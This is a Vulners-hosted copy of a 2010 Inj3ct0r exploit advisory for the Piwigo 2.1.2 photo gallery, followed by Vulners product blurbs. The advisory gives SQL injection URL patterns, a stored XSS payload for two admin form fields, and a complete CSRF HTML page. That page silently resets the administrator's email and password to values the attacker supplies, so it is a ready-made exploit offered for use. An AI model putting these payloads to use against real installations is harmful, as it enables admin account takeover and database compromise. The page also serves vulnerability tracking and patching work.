Vulners
Lucene search
Piwigo 2.1.2 Cross Site Request Forgery / Cross Site Scripting / SQL Injection
`
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ###################################### 1
0 Sweet the Algerian Haxxor 0
1 ###################################### 0
0 1
1 [+]Exploit Title: piwigo-2.1.2 Multiple vulnerabilities 0
0 [+]Date: 11/09/2010 1
1 [+]Author: Sweet 0
0 [+]Contact : [email protected] 0
1 [+]Software Link: http://fr.piwigo.org 0
0 [+]Download:http://fr.piwigo.org/releases/2.1.2 1
1 [+]Version:2.1.2 0
0 [+]Tested on: WinXp sp3 1
1 [+]Risk : Hight 0
0 [+]Description : Piwigo is a software for picture web gallerie 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
--=Sql injection=--
http://www.target.com/path/[email protected]&author=sweet&cat=1[SQLi]&since=1&sort_by=date&sort_order=DESC&items_number=5
http://www.target.com/path/picture.php?1sweet[SQLi]&action=rate=0
http://www.target.com/path/index.php?/search/10[SQli]
--=Stored Xss=--
Admin login required
Attack pattern : >'<script>alert("Sweet")</script>
http://www.target.com/path/admin.php?page=tags
The POST variable "Nouveau tag" is vulnerable to a stored xss attack
http://www.target.com/path/admin.php?page=cat_list
The POST variable "Ajouter une catégorie virtuelle" is vulnerable to a stored xss attack
--=CSRF=--
Change admin password exploit
<html>
<body>
<h1>Piwigo-2.1.2 Change admin password CSRF </h1>
<form method="POST" name="form0" action="http://www.target.com/path/admin.php?page=profile&user_id=1">
<input type="hidden" name="redirect" value="admin.php?page"/>
<input type="hidden" name="mail_address" value="[email protected]"/> <!-- Your email here -->
<input type="hidden" name="use_new_pwd" value="sweet"/> <!-- Your password here -->
<input type="hidden" name="passwordConf" value="sweet"/> <!-- Your password here -->
<input type="hidden" name="nb_image_line" value="5"/>
<input type="hidden" name="nb_line_page" value="3"/>
<input type="hidden" name="theme" value="Sylvia"/>
<input type="hidden" name="language" value="fr_FR"/>
<input type="hidden" name="recent_period" value="7"/>
<input type="hidden" name="expand" value="false"/>
<input type="hidden" name="show_nb_comments" value="false"/>
<input type="hidden" name="show_nb_hits" value="false"/>
<input type="hidden" name="maxwidth" value=""/>
<input type="hidden" name="maxheight" value=""/>
<p> Push the Button <input type="submit" name="validate" value="Valider"/> </p>
</form>
<form method="GET" name="form1" action="http://www.target.com/path/admin.php?page=user_list">
<input type="hidden" name="name" value="value"/>
</form>
</body>
</html>
[ thx and RIP to Milw0rm.com , JF - Hamst0r - Keystroke you always be right here 3> ] , inj3ct0r.com , exploit-db.com
1,2,3 VIVA LALGERIE
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Sep 2010 00:00Current
0.3Low risk
Vulners AI Score0.3